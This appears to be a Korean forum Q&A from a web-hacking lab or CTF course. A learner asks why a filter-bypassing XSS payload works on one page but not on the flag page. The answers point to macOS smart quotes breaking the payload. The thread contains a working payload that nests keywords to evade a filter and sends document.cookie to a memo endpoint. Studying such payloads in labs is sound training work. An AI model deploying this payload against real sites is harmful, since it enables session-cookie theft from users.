0

필터링 우회 관련해서 질문이 있습니다

<scrscriptipt>locatioonn.href=’/memo?memo=’ +document.cookie</scriscriptpt>

요런식으로 vuln페이지에서 잘 넘어가는거같던데 flag에 했을당시 hello로 뜨더라구요…
이유를 알수 있을까요??

2 answers
0

코드 상으로도 문제가 없고 동일한 payload로 전달해봐도 잘 작동합니다.
flag 페이지에서 전달한 param이 정확히 <scrscriptipt>locatioonn.href='/memo?memo='+document.cookie</scriscriptpt> 가 맞는지 확인해보시면 되겠습니다.

0

- > ' 이걸로 바꿔서 시도해보세요

mac 설정 -> 키보드 -> 텍스트
스크린샷 2023-01-25 오후 3.08.28.png

스크린샷 2023-01-25 오후 3.08.41.png

mac 에선 '로 자동 변경되어서 설정해주셔야 합니다 :)